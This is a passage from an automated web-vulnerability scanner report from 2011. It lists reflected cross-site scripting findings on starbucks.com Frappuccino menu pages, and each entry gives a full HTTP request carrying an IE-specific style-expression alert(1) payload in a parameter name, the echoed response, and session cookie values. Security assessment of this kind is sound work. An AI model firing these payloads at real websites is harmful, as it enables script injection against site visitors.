Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86623"style%3d"x%3aexpression(alert(1))"10adab1fa11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86623"style="x:expression(alert(1))"10adab1fa11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee?86623"style%3d"x%3aexpression(alert(1))"10adab1fa11=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:15 GMT
Connection: close
Content-Length: 45260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee?86623"style="x:expression(alert(1))"10adab1fa11=1"/>
...[SNIP]...

1.756. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce1b8"style%3d"x%3aexpression(alert(1))"2d1316ff148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce1b8"style="x:expression(alert(1))"2d1316ff148 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee?ce1b8"style%3d"x%3aexpression(alert(1))"2d1316ff148=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:05 GMT
Connection: close
Content-Length: 43245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee?ce1b8"style="x:expression(alert(1))"2d1316ff148=1"/>
...[SNIP]...

1.757. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dfa"style%3d"x%3aexpression(alert(1))"3f1516979fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30dfa"style="x:expression(alert(1))"3f1516979fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme?30dfa"style%3d"x%3aexpression(alert(1))"3f1516979fe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:32 GMT
Connection: close
Content-Length: 45231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme?30dfa"style="x:expression(alert(1))"3f1516979fe=1"/>
...[SNIP]...

1.758. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6196e"style%3d"x%3aexpression(alert(1))"b0d39f9484b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6196e"style="x:expression(alert(1))"b0d39f9484b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee?6196e"style%3d"x%3aexpression(alert(1))"b0d39f9484b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:50 GMT
Connection: close
Content-Length: 45459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee?6196e"style="x:expression(alert(1))"b0d39f9484b=1"/>
...[SNIP]...

1.759. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c87"style%3d"x%3aexpression(alert(1))"ae192e3c688 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7c87"style="x:expression(alert(1))"ae192e3c688 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme?b7c87"style%3d"x%3aexpression(alert(1))"ae192e3c688=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:33 GMT
Connection: close
Content-Length: 45510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme?b7c87"style="x:expression(alert(1))"ae192e3c688=1"/>
...[SNIP]...

1.760. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea630"style%3d"x%3aexpression(alert(1))"09dc08373b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea630"style="x:expression(alert(1))"09dc08373b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee?ea630"style%3d"x%3aexpression(alert(1))"09dc08373b2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:15 GMT
Connection: close
Content-Length: 43324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee?ea630"style="x:expression(alert(1))"09dc08373b2=1"/>
...[SNIP]...

1.761. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61386"style%3d"x%3aexpression(alert(1))"1ed5d722818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61386"style="x:expression(alert(1))"1ed5d722818 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee?61386"style%3d"x%3aexpression(alert(1))"1ed5d722818=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:08 GMT
Connection: close
Content-Length: 44974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee?61386"style="x:expression(alert(1))"1ed5d722818=1"/>
...[SNIP]...

1.762. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e38"style%3d"x%3aexpression(alert(1))"2b26c7960fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67e38"style="x:expression(alert(1))"2b26c7960fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee?67e38"style%3d"x%3aexpression(alert(1))"2b26c7960fc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:13 GMT
Connection: close
Content-Length: 45105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee?67e38"style="x:expression(alert(1))"2b26c7960fc=1"/>
...[SNIP]...

1.763. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ffa"style%3d"x%3aexpression(alert(1))"445beb5d76e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ffa"style="x:expression(alert(1))"445beb5d76e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme?89ffa"style%3d"x%3aexpression(alert(1))"445beb5d76e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:57 GMT
Connection: close
Content-Length: 45546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme?89ffa"style="x:expression(alert(1))"445beb5d76e=1"/>
...[SNIP]...

1.764. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38463"style%3d"x%3aexpression(alert(1))"4a36fa03848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 38463"style="x:expression(alert(1))"4a36fa03848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee?38463"style%3d"x%3aexpression(alert(1))"4a36fa03848=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:07 GMT
Connection: close
Content-Length: 45029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee?38463"style="x:expression(alert(1))"4a36fa03848=1"/>
...[SNIP]...

1.765. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8fd2"style%3d"x%3aexpression(alert(1))"aae7138fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8fd2"style="x:expression(alert(1))"aae7138fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage?f8fd2"style%3d"x%3aexpression(alert(1))"aae7138fd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:38 GMT
Connection: close
Content-Length: 45195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage?f8fd2"style="x:expression(alert(1))"aae7138fd=1"/>
...[SNIP]...

1.766. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 273ef"style%3d"x%3aexpression(alert(1))"6997b4054c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 273ef"style="x:expression(alert(1))"6997b4054c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme?273ef"style%3d"x%3aexpression(alert(1))"6997b4054c9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:33 GMT
Connection: close
Content-Length: 45219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme?273ef"style="x:expression(alert(1))"6997b4054c9=1"/>
...[SNIP]...

1.767. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a811"style%3d"x%3aexpression(alert(1))"b915f0e0432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a811"style="x:expression(alert(1))"b915f0e0432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee?2a811"style%3d"x%3aexpression(alert(1))"b915f0e0432=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:09 GMT
Connection: close
Content-Length: 45446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee?2a811"style="x:expression(alert(1))"b915f0e0432=1"/>
...[SNIP]...

1.768. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dcf"style%3d"x%3aexpression(alert(1))"65b8aeb2cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68dcf"style="x:expression(alert(1))"65b8aeb2cb6 in the application's response.

